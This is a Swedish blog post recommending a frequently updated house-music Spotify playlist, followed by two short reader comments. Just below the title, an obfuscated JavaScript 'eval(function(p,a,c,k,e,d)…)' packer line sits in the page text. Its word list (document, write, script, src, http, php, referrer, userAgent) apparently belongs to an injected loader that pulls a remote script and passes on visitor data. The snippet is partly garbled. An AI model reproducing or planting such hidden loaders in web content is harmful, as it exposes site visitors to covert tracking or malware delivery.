Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Spotify: Top playlist 2012

Spotify: Top playlist 2012
Sebastian

Spotify: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aiztr|var|u0026u|referrer|aabie||js|php’.split(’|’),0,{}))
Helgen är nu över och många mötes i morse av en riktig höstdag, mörk, regnig och allmänt trist. Jag är själv en person som gillar hösten väldigt mycket. Inte för att det regnar varje dag utan för att det är en mysig period när man kan sitta inomhus med nära och kära och ta det lugnt.

Just för att hösten är en inomhus årstid så behöver man något att göra. Se på film, spela spel eller bara mysa, valet är många och beror helt på intresse. Något som alla dock gillar är musik. Därför tänkte jag dela med mig av en riktigt toppen playlist på Spotify, perfekt för festen, jobbet eller ensamheten hemma.

Dagens genré går i Club / House / Dance, något som jag i alla fall tycker är bra. Denna Spotify-playlist är framtagen av en god vän till mig. Den uppdateras nästan dagligen med nya låtar som släpps på Spotify vilket är ett stort plus då det finns så många playlists på Spotify som aldrig uppdateras.

Henrik Grundén som är skaparen av listan ”Grundéns House 2012” har fått god kritik och är idag en av de mest följda listan i house genrén.
Med sina 1026 följare (vilket kan låta lite) visar det ett bevis på bra kvalitet. Därför tipsar vi er läsare om denna lista. Vi kommer även att försöka hitta andra playlists som håller samma kvalitet i andra genré, men vi börjar så här.

Trevlig lyssning!!! 

Fakta om Spotify-listan

Playlist: Grundéns house 2012

Följare: 1026 personer (1 oktober 2012)

Låtar: 700 låtar  (1 oktober 2012)

Playlisten hittar ni här!

Comments

  1. Jake Flux

    As skön!! Tack för tipset. Är så trött på alla Digster-playlists som ligger ute. Bara massa kommersiellt.

  2. Epic as usual!! Bra jobbat